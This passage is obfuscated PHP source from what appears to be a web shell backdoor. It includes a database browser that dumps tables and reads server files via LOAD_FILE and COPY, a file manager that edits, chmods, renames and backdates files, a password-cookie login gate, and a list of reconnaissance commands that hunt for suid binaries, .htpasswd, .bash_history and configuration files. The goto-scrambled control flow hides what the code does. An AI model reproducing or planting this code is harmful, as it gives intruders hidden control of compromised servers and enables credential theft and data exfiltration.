} goto Aa2d0; db83a: echo '<option value="' . $value . '" ' . ($value == $_POST['sql_base'] ? 'selected' : '') . '>' . $value . '</option>'; goto d8f7e; F07e6: F571f: goto B7bdb; Ebef1: echo "<select name=sql_base><option value=''></option>"; goto a64a4; Fcaa4: echo '</select>'; goto C16d9; B8f49: switch ($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); goto C590c; case "UTF-8": $db->setCharset('utf8'); goto C590c; case "KOI8-R": $db->setCharset('koi8r'); goto C590c; case "KOI8-U": $db->setCharset('koi8u'); goto C590c; case "cp866": $db->setCharset('cp866'); goto C590c; } goto F07e6; d8f7e: goto E75ab; goto F06a2; F06a2: A080e: goto Fcaa4; a64a4: E75ab: goto d2fc5; Aa2d0: list($key, $value) = each($item); goto db83a; B7bdb: C590c: goto d7e16; d7e16: $db->listDbs(); goto Ebef1; C16d9: } else { echo $tmp; } } else { echo $tmp; } goto Ff4b1; d463a: echo "\r\n<h1>Sql browser</h1><div class=content>\r\n<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>\r\n<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\r\n<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n<td><select name='type'><option value='mysql' "; goto B7a3a; F5280: $tmp = "<input type=text name=sql_base value=''>"; goto Eae9d; Ced81: class DbClass { var $type; var $link; var $res; function __construct($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { goto d46c5; F7ac2: c1f0e: goto Ab38f; aa588: return false; goto Dd140; d46c5: switch ($this->type) { case 'mysql': if ($this->link = @mysql_connect($host, $user, $pass, true)) { return true; } goto De113; case 'pgsql': goto a866e; fdd87: goto De113; goto dcad3; Bed65: if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) { return true; } goto fdd87; D921f: if (!$host[1]) { $host[1] = 5432; } goto Bed65; a866e: $host = explode(':', $host); goto D921f; dcad3: } goto F7ac2; Ab38f: De113: goto aa588; Dd140: } function selectdb($db) { goto F4ecc; b60d2: a1cee: goto fe9d8; F4ecc: switch ($this->type) { case 'mysql': if (@mysql_select_db($db)) { return true; } goto a1cee; } goto B1b2d; fe9d8: return false; goto baac1; B1b2d: ae4d9: goto b60d2; baac1: } function query($str) { goto f9248; bdbb5: d8bee: goto d94b3; dcc2b: e711c: goto bdbb5; f9248: switch ($this->type) { case 'mysql': return $this->res = @mysql_query($str); goto d8bee; case 'pgsql': return $this->res = @pg_query($this->link, $str); goto d8bee; } goto dcc2b; d94b3: return false; goto E2a4e; E2a4e: } function fetch() { goto c32de; c8ed3: db0fa: goto be050; Aa244: switch ($this->type) { case 'mysql': return @mysql_fetch_assoc($res); goto fd000; case 'pgsql': return @pg_fetch_assoc($res); goto fd000; } goto c8ed3; c32de: $res = func_num_args() ? func_get_arg(0) : $this->res; goto Aa244; be050: fd000: goto be497; be497: return false; goto cbf6e; cbf6e: } function listDbs() { goto F5062; Fb480: return false; goto b2a5e; F5062: switch ($this->type) { case 'mysql': return $this->query("SHOW databases"); goto A807a; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); goto A807a; } goto F463c; F463c: c3236: goto Cab0c; Cab0c: A807a: goto Fb480; b2a5e: } function listTables() { goto F9b57; ed78b: a3601: goto F9f31; F9f31: fec45: goto E42c1; E42c1: return false; goto Ab102; F9b57: switch ($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); goto fec45; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); goto fec45; } goto ed78b; Ab102: } function error() { goto f1b3e; e288f: return false; goto af638; D00af: facf5: goto ceb99; f1b3e: switch ($this->type) { case 'mysql': return @mysql_error(); goto A5d44; case 'pgsql': return @pg_last_error(); goto A5d44; } goto D00af; ceb99: A5d44: goto e288f; af638: } function setCharset($str) { goto fea4d; fea4d: switch ($this->type) { case 'mysql': if (function_exists('mysql_set_charset')) { return @mysql_set_charset($str, $this->link); } else { $this->query('SET CHARSET ' . $str); } goto C4b60; case 'pgsql': return @pg_set_client_encoding($this->link, $str); goto C4b60; } goto D2a69; Bef52: C4b60: goto C7956; D2a69: ea222: goto Bef52; C7956: return false; goto Cf101; Cf101: } function loadFile($str) { goto e1a00; E02ac: return false; goto decfd; B74a1: b0987: goto E02ac; e1a00: switch ($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file")); goto b0987; case 'pgsql': goto Ee8dc; d0ed3: D97ff: goto Eaf19; Eaf19: $this->query('drop table FkLpt2'); goto D2a14; B8cda: goto Dc34f; goto d0ed3; D2a14: return array('file' => implode("\n", $r)); goto D7aa0; bf1a2: $r[] = $i['file']; goto B8cda; d1b4c: if (!($i = $this->fetch())) { goto D97ff; } goto bf1a2; E8a37: Dc34f: goto d1b4c; D7aa0: goto b0987; goto E4d0d; B7f0e: $r = array(); goto E8a37; Ee8dc: $this->query("CREATE TABLE FkLpt2(file text);COPY FkLpt2 FROM '" . addslashes($str) . "';select file from FkLpt2;"); goto B7f0e; E4d0d: } goto bded9; bded9: ebff7: goto B74a1; decfd: } function dump($table, $fp = false) { goto E1de1; ce487: c22a2: goto Dcba8; d6dba: Ec9fa: goto ce487; Dcba8: return false; goto ca14c; E1de1: switch ($this->type) { case 'mysql': goto Ad9e5; ca49c: $sql = $create[1] . ";\n"; goto E3066; Dd70d: $columns = array(); goto B75da; Fed05: $sql = ''; goto Bc2ef; fdacf: D9b6e: goto fe88c; Bc2ef: if ($i % 1000 == 0) { $head = true; $sql = ";\n\n"; } goto Dd70d; E2014: $this->query('SELECT * FROM `' . $table . '`'); goto c0251; c0251: $i = 0; goto fcd67; e00f9: if (!$head) { if ($fp) { fwrite($fp, ";\n\n"); } else { echo ";\n\n"; } } goto C69d6; fcd67: $head = true; goto fdacf; B75da: foreach ($item as $k => $v) { goto D0974; D0974: if ($v === null) { $item[$k] = "NULL"; } elseif (is_int($v)) { $item[$k] = $v; } else { $item[$k] = "'" . @mysql_real_escape_string($v) . "'"; } goto bda1f; bda1f: $columns[] = "`" . $k . "`"; goto ce561; ce561: D1f46: goto c22a1; c22a1: } goto C7717; Ad9e5: $res = $this->query('SHOW CREATE TABLE `' . $table . '`'); goto a5f12; Dd9b7: if ($head) { $sql .= 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ") VALUES \n\t(" . implode(", ", $item) . ')'; $head = false; } else { $sql .= "\n\t,(" . implode(", ", $item) . ')'; } goto B32f9; fe764: $i++; goto E410a; B32f9: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto fe764; C7717: E9764: goto Dd9b7; fe88c: if (!($item = $this->fetch())) { goto Aa4de; } goto Fed05; a5f12: $create = mysql_fetch_array($res); goto ca49c; C69d6: goto c22a2; goto eacc4; E3066: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto E2014; ea9ae: Aa4de: goto e00f9; E410a: goto D9b6e; goto ea9ae; eacc4: case 'pgsql': goto a9508; B4eb9: goto c22a2; goto a44be; c8a2b: goto b6ee7; goto A2d9a; e72dc: b6ee7: goto A8afd; a9508: $this->query('SELECT * FROM ' . $table); goto e72dc; d918b: $sql = 'INSERT INTO ' . $table . ' (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . "\n"; goto bc627; A8afd: if (!($item = $this->fetch())) { goto Cf00a; } goto B19f7; A2d9a: Cf00a: goto B4eb9; d5d4b: f9861: goto d918b; Bf9f0: foreach ($item as $k => $v) { goto e5d65; e5d65: $item[$k] = "'" . addslashes($v) . "'"; goto Da6f9; Da6f9: $columns[] = $k; goto B509f; B509f: bd91e: goto Dff55; Dff55: } goto d5d4b; bc627: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto c8a2b; B19f7: $columns = array(); goto Bf9f0; a44be: } goto d6dba; ca14c: } } goto Ba1e2; d2922: if (isset($db) && $db->link) { goto Ea50a; F5080: if (!empty($_POST['sql_base'])) { goto f30a0; fcb69: if (@$_POST['p1'] == 'query' && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if ($db->res !== false) { goto bf3a7; bf3a7: $title = false; goto B8f2e; aa09c: if (!$title) { goto de487; e13ec: f010f: goto df868; e0ed6: $title = true; goto badc8; d1697: $line = 2; goto e1491; df868: reset($item); goto e0ed6; de487: echo '<tr>'; goto e490b; e490b: foreach ($item as $key => $value) { echo '<th>' . $key . '</th>'; Bbc3b: } goto e13ec; badc8: echo '</tr><tr>'; goto d1697; e1491: } goto dc163; B8f2e: echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">'; goto a7c09; beb75: echo '</table>'; goto d26bc; aff70: goto a6970; goto aa05e; e3a57: Dae04: goto C8928; De0d1: $line = $line == 1 ? 2 : 1; goto Eef4d; dc163: echo '<tr class="l' . $line . '">'; goto De0d1; f9190: if (!($item = $db->fetch())) { goto bbafd; } goto aa09c; f10fd: a6970: goto f9190; a7c09: $line = 1; goto f10fd; C8928: echo '</tr>'; goto aff70; aa05e: bbafd: goto beb75; Eef4d: foreach ($item as $key => $value) { if ($value == null) { echo '<td><i>null</i></td>'; } else { echo '<td>' . nl2br(htmlspecialchars($value)) . '</td>'; } ec9a4: } goto e3a57; d26bc: } else { echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>'; } } goto Ab487; c62c3: if (!empty($_POST['p2']) && $_POST['p1'] != 'loadfile') { echo htmlspecialchars($_POST['p2']); } goto Cf0f3; d2d53: if (!($item = $db->fetch($tbls_res))) { goto b40e9; } goto Cd506; c1604: goto Cb5c2; goto fc59e; Cf0f3: echo "</textarea><br/><input type=submit value='Execute'>"; goto E3f25; C4296: echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; goto c2c0c; f30a0: $db->selectdb($_POST['sql_base']); goto C4296; Ee032: if (@$_POST['p1'] == 'select') { goto Afa80; D4816: $num = $db->fetch(); goto f45c1; D20cd: if ($_POST['type'] == 'pgsql') { $_POST['p2'] = 'SELECT * FROM ' . $_POST['p2'] . ' LIMIT 30 OFFSET ' . $_POST['p3'] * 30; } else { $_POST['p2'] = 'SELECT * FROM `' . $_POST['p2'] . '` LIMIT ' . $_POST['p3'] * 30 . ',30'; } goto Cd2e1; b6510: $_POST['p3']--; goto D20cd; f2ccd: if ($_POST['p3'] > 1) { echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] - 1) . ")'>< Prev</a>"; } goto dc67a; f45c1: $pages = ceil($num['n'] / 30); goto dca32; Afa80: $_POST['p1'] = 'query'; goto d9c46; Cd2e1: echo "<br><br>"; goto B79fd; dca32: echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>" . $_POST['p2'] . "</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . (int) $_POST['p3'] . ">"; goto c6454; d9c46: $_POST['p3'] = $_POST['p3'] ? $_POST['p3'] : 1; goto Bc56c; c6454: echo " of {$pages}"; goto f2ccd; dc67a: if ($_POST['p3'] < $pages) { echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] + 1) . ")'>Next ></a>"; } goto b6510; Bc56c: $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); goto D4816; B79fd: } goto fcb69; Df221: Cb5c2: goto d2d53; E3f25: echo "</td></tr>"; goto d242c; Cd506: list($key, $value) = each($item); goto F865b; D0971: echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; goto Ee032; e3237: echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'> <a href=# onclick=\"st('" . $value . "',1)\">" . $value . "</a>" . (empty($_POST['sql_count']) ? ' ' : " <small>({$n['n']})</small>") . "</nobr><br>"; goto c1604; fc59e: b40e9: goto D0971; F865b: if (!empty($_POST['sql_count'])) { $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM ' . $value . '')); } goto Ba38b; c2c0c: $tbls_res = $db->listTables(); goto Df221; Ab487: echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; goto c62c3; Ba38b: $value = htmlspecialchars($value); goto e3237; d242c: } goto a11f8; a11f8: echo "</table></form><br/>"; goto Fb120; Fb120: if ($_POST['type'] == 'mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if ($db->fetch()) { echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; } } goto E6415; Ea50a: echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; goto F5080; E6415: if (@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']); echo '<br/><pre class=ml1>' . htmlspecialchars($file['file']) . '</pre>'; } goto c310c; c310c: } else { echo htmlspecialchars($db->error()); } goto c80a4; c65e2: if (@$_POST['p2'] == 'download' && @$_POST['p1'] != 'select') { goto B58e0; Dc71e: switch ($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); goto A973e; case "UTF-8": $db->setCharset('utf8'); goto A973e; case "KOI8-R": $db->setCharset('koi8r'); goto A973e; case "KOI8-U": $db->setCharset('koi8u'); goto A973e; case "cp866": $db->setCharset('cp866'); goto A973e; } goto b2366; D9fce: $db->selectdb($_POST['sql_base']); goto Dc71e; B58e0: $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); goto D9fce; b2366: C8fd4: goto A215d; D7d7f: if (empty($_POST['file'])) { goto C6839; A37a3: header("Content-Disposition: attachment; filename=dump.sql"); goto A70ea; A70ea: header("Content-Type: text/plain"); goto a4802; a4802: foreach ($_POST['tbl'] as $v) { $db->dump($v); b5040: } goto Bc5af; C6839: ob_start("ob_gzhandler", 4096); goto A37a3; E6819: exit; goto F28ab; Bc5af: Db4bf: goto E6819; F28ab: } elseif ($fp = @fopen($_POST['file'], 'w')) { goto B4a7a; B4a7a: foreach ($_POST['tbl'] as $v) { $db->dump($v, $fp); F1b21: } goto f2a77; ffff2: fclose($fp); goto F061d; f2a77: C5895: goto ffff2; F061d: unset($_POST['p2']); goto Afdcc; Afdcc: } else { die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>'); } goto ab1d0; A215d: A973e: goto D7d7f; ab1d0: } goto e5f4d; eea7d: echo ">MySql</option><option value='pgsql' "; goto e3ef9; B7a3a: if (@$_POST['type'] == 'mysql') { echo 'selected'; } goto eea7d; E748f: echo ">PostgreSql</option></select></td>\r\n<td><input type=text name=sql_host value=\"" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "\"></td>\r\n<td><input type=text name=sql_login value=\"" . (empty($_POST['sql_login']) ? 'root' : htmlspecialchars($_POST['sql_login'])) . "\"></td>\r\n<td><input type=text name=sql_pass value=\"" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "\"></td><td>"; goto F5280; c80a4: echo '</div>'; goto F933c; e5f4d: FkLptHeader(); goto d463a; Daa52: } goto F0f4b; ea5af: error_reporting(0); goto A0afe; fa056: function FkLptPerms($p) { goto d2cf6; B911b: $i .= $p & 0x10 ? 'w' : '-'; goto cc9b6; cc9b6: $i .= $p & 0x8 ? $p & 0x400 ? 's' : 'x' : ($p & 0x400 ? 'S' : '-'); goto F197b; da49a: $i .= $p & 0x40 ? $p & 0x800 ? 's' : 'x' : ($p & 0x800 ? 'S' : '-'); goto D966f; F197b: $i .= $p & 0x4 ? 'r' : '-'; goto B3ca5; B462f: $i .= $p & 0x80 ? 'w' : '-'; goto da49a; B3ca5: $i .= $p & 0x2 ? 'w' : '-'; goto e09c8; Ce8d1: $i .= $p & 0x100 ? 'r' : '-'; goto B462f; D966f: $i .= $p & 0x20 ? 'r' : '-'; goto B911b; b4dcf: return $i; goto C7a02; d2cf6: if (($p & 0xc000) == 0xc000) { $i = 's'; } elseif (($p & 0xa000) == 0xa000) { $i = 'l'; } elseif (($p & 0x8000) == 0x8000) { $i = '-'; } elseif (($p & 0x6000) == 0x6000) { $i = 'b'; } elseif (($p & 0x4000) == 0x4000) { $i = 'd'; } elseif (($p & 0x2000) == 0x2000) { $i = 'c'; } elseif (($p & 0x1000) == 0x1000) { $i = 'p'; } else { $i = 'u'; } goto Ce8d1; e09c8: $i .= $p & 0x1 ? $p & 0x200 ? 't' : 'x' : ($p & 0x200 ? 'T' : '-'); goto b4dcf; C7a02: } goto Cca3c; d98af: if ($os == 'win') { $aliases = array("List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all"); } else { $aliases = array("List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv"); } goto E01a8; E9488: if (!empty($auth_pass)) { if (isset($_POST['pass']) && md5($_POST['pass']) == $auth_pass) { FkLptsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); } if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || $_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass) { FkLptLogin(); } } goto d6d6f; D5d07: @ini_set('max_execution_time', 0); goto B5d3e; ef653: function actionFilesTools() { goto B5986; C42ce: switch ($_POST['p2']) { case 'view': goto f2eef; C9a11: goto F5018; goto bac3e; b2215: $fp = @fopen($_POST['p1'], 'r'); goto d6daf; F3bc7: echo '</pre>'; goto C9a11; d6daf: if ($fp) { goto ab467; C33e1: if (@feof($fp)) { goto f17a7; } goto c929a; E83b0: @fclose($fp); goto bdad5; ab467: e8177: goto C33e1; affd6: f17a7: goto E83b0; c929a: echo htmlspecialchars(@fread($fp, 1024)); goto A1f24; A1f24: goto e8177; goto affd6; bdad5: } goto F3bc7; f2eef: echo '<pre class=ml1>'; goto b2215; bac3e: case 'highlight': if (@is_readable($_POST['p1'])) { goto Adc78; cf6fb: echo str_replace(array('<span ', '</span>'), array('<font ', '</font>'), $code) . '</div>'; goto c96a0; Adc78: echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; goto F55e4; F55e4: $code = @highlight_file($_POST['p1'], true); goto cf6fb; c96a0: } goto F5018; case 'chmod': goto B4ef5; B4ef5: if (!empty($_POST['p3'])) { goto F4aa6; C9bfa: if (!@chmod($_POST['p1'], $perms)) { echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; } goto b19c4; A0af3: --$i; goto d2d58; c5e82: $perms += (int) $_POST['p3'][$i] * pow(8, strlen($_POST['p3']) - $i - 1); goto a9734; b204f: D86ac: goto Be29e; a9734: c6858: goto A0af3; d86a5: $i = strlen($_POST['p3']) - 1; goto b204f; C9738: E8d9e: goto C9bfa; F4aa6: $perms = 0; goto d86a5; d2d58: goto D86ac; goto C9738; Be29e: if (!($i >= 0)) { goto E8d9e; } goto c5e82; b19c4: } goto Cd10e; C29af: goto F5018; goto ab777; Cd10e: clearstatcache(); goto Ce99d; Ce99d: echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="' . substr(sprintf('%o', fileperms($_POST['p1'])), -4) . '"><input type=submit value=">>"></form>'; goto C29af; ab777: case 'edit': goto D7bb2; bcebc: echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>'; goto Fc76c; ef5ad: if (!empty($_POST['p3'])) { goto D947f; a1387: if ($fp) { goto ad713; Aaf9b: @fclose($fp); goto a80d6; ad713: @fwrite($fp, $_POST['p3']); goto Aaf9b; A5fcf: @touch($_POST['p1'], $time, $time); goto E9db2; a80d6: echo 'Saved!<br><script>p3_="";</script>'; goto A5fcf; E9db2: } goto F4be4; E0a97: $fp = @fopen($_POST['p1'], "w"); goto a1387; D947f: $time = @filemtime($_POST['p1']); goto D44fb; D44fb: $_POST['p3'] = substr($_POST['p3'], 1); goto E0a97; F4be4: } goto bcebc; Fc76c: $fp = @fopen($_POST['p1'], 'r'); goto d26c9; Cd65d: echo '</textarea><input type=submit value=">>"></form>'; goto Fa490; d26c9: if ($fp) { goto a5118; B475a: @fclose($fp); goto D256c; adc62: goto f52cc; goto A92f8; a67c9: echo htmlspecialchars(@fread($fp, 1024)); goto adc62; a5118: f52cc: goto b02de; b02de: if (@feof($fp)) { goto B5a69; } goto a67c9; A92f8: B5a69: goto B475a; D256c: } goto Cd65d; D7bb2: if (!is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; goto F5018; } goto ef5ad; Fa490: goto F5018; goto Ca42e; Ca42e: case 'hexdump': goto c7c92; bd8a4: $h = array('00000000<br>', '', ''); goto C18f6; Fdcf7: ++$i; goto F7220; f7a88: cf29b: goto e7c10; d32c2: $i = 0; goto e8bbf; c7c92: $c = @file_get_contents($_POST['p1']); goto Ccb32; ceb8e: $n++; goto e782a; F7220: goto faf20; goto f7a88; e782a: if ($n == 32) { goto C835f; C835f: $n = 0; goto bffed; bae6c: $h[1] .= '<br>'; goto A8363; bffed: if ($i + 1 < $len) { $h[0] .= sprintf('%08X', $i + 1) . '<br>'; } goto bae6c; A8363: $h[2] .= "\n"; goto F2ce5; F2ce5: } goto e30cd; F2f5d: D6587: goto aca92; e8bbf: faf20: goto aad38; C18f6: $len = strlen($c); goto d32c2; e7c10: echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>' . $h[0] . '</pre></span></td><td bgcolor=#282828><pre>' . $h[1] . '</pre></td><td bgcolor=#333333><pre>' . htmlspecialchars($h[2]) . '</pre></td></tr></table>'; goto db9ed; db9ed: goto F5018; goto a6258; F17be: $h[1] .= sprintf('%02X', ord($c[$i])) . ' '; goto eaca0; eaca0: switch (ord($c[$i])) { case 0: $h[2] .= ' '; goto C68e4; case 9: $h[2] .= ' '; goto C68e4; case 10: $h[2] .= ' '; goto C68e4; case 13: $h[2] .= ' '; goto C68e4; default: $h[2] .= $c[$i]; goto C68e4; } goto F2f5d; Ccb32: $n = 0; goto bd8a4; aad38: if (!($i < $len)) { goto cf29b; } goto F17be; aca92: C68e4: goto ceb8e; e30cd: be006: goto Fdcf7; a6258: case 'rename': goto Bed69; Bed69: if (!empty($_POST['p3'])) { if (!@rename($_POST['p1'], $_POST['p3'])) { echo 'Can\'t rename!<br>'; } else { die('<script>g(null,null,"' . urlencode($_POST['p3']) . '",null,"")</script>'); } } goto d3686; d3686: echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="' . htmlspecialchars($_POST['p1']) . '"><input type=submit value=">>"></form>'; goto aa05d; aa05d: goto F5018; goto C7d79; C7d79: case 'touch': goto B5b0d; B174a: clearstatcache(); goto Fd16c; Fcd09: goto F5018; goto Dcc43; Fd16c: echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="' . date("Y-m-d H:i:s", @filemtime($_POST['p1'])) . '"><input type=submit value=">>"></form>'; goto Fcd09; B5b0d: if (!empty($_POST['p3'])) { $time = strtotime($_POST['p3']); if ($time) { if (!touch($_POST['p1'], $time, $time)) { echo 'Fail!'; } else { echo 'Touched!'; } } else { echo 'Bad time format!'; } } goto B174a; Dcc43: } goto db7c1; D6ebf: if (!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else { $gid = @posix_getgrgid(@filegroup($_POST['p1'])); } goto d212b; Ae9fb: if (@$_POST['p2'] == 'download') { if (@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { goto De5e5; F1fca: header("Content-Disposition: attachment; filename=" . basename($_POST['p1'])); goto c3b6c; De5e5: ob_start("ob_gzhandler", 4096); goto F1fca; a2277: $fp = @fopen($_POST['p1'], "r"); goto d8b95; c3b6c: if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: " . $type); } else { header("Content-Type: application/octet-stream"); } goto a2277; d8b95: if ($fp) { goto c629a; E2b4e: f79a1: goto e267c; c629a: A8d16: goto Ffda3; d4d62: echo @fread($fp, 1024); goto a536a; Ffda3: if (@feof($fp)) { goto f79a1; } goto d4d62; a536a: goto A8d16; goto E2b4e; e267c: fclose($fp); goto B44d7; B44d7: } goto f7afc; f7afc: } exit; } goto db2c9; B5986: if (isset($_POST['p1'])) { $_POST['p1'] = urldecode($_POST['p1']); } goto Ae9fb; D266a: FkLptHeader(); goto d5db1; f312f: foreach ($m as $v) { echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\'' . strtolower($v) . '\')">' . (strtolower($v) == @$_POST['p2'] ? '<b>[ ' . $v . ' ]</b>' : $v) . '</a> '; f1802: } goto E8df6; b11c6: if (empty($_POST['p2'])) { $_POST['p2'] = 'view'; } goto c284e; ab4e3: if (!file_exists(@$_POST['p1'])) { goto cb374; cb374: echo 'File not exists'; goto d00c9; D1604: return; goto e45df; d00c9: FkLptFooter(); goto D1604; e45df: } goto abdd8; E8df6: F0ddb: goto A8106; Cbd23: FkLptFooter(); goto def43; db7c1: a7414: goto Bbb17; d5db1: echo '<h1>File tools</h1><div class=content>'; goto ab4e3; abdd8: $uid = @posix_getpwuid(@fileowner($_POST['p1'])); goto D6ebf; A8106: echo '<br><br>'; goto C42ce; B0586: echo '<span>Change time:</span> ' . date('Y-m-d H:i:s', filectime($_POST['p1'])) . ' <span>Access time:</span> ' . date('Y-m-d H:i:s', fileatime($_POST['p1'])) . ' <span>Modify time:</span> ' . date('Y-m-d H:i:s', filemtime($_POST['p1'])) . '<br><br>'; goto b11c6; c284e: if (is_file($_POST['p1'])) { $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); } else { $m = array('Chmod', 'Rename', 'Touch'); } goto f312f; db2c9: if (@$_POST['p2'] == 'mkfile') { if (!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if ($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } goto D266a; d212b: echo '<span>Name:</span> ' . htmlspecialchars(@basename($_POST['p1'])) . ' <span>Size:</span> ' . (is_file($_POST['p1']) ? FkLptViewSize(filesize($_POST['p1'])) : '-') . ' <span>Permission:</span> ' . FkLptPermsColor($_POST['p1']) . ' <span>Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . '<br>'; goto B0586; Bbb17: F5018: goto d6f4a; d6f4a: echo '</div>'; goto Cbd23; def43: } goto e796f; B5d3e: @set_time_limit(0); goto fce78; F9379: $safe_mode = @ini_get('safe_mode'); goto Df69b; b450d: function FkLptLogin() { die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>"); } goto dd88c; A0afe: $auth_pass = ""; goto Eeced; d6d6f: if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $os = 'win'; } else { $os = 'nix'; } goto F9379; b8f60: if 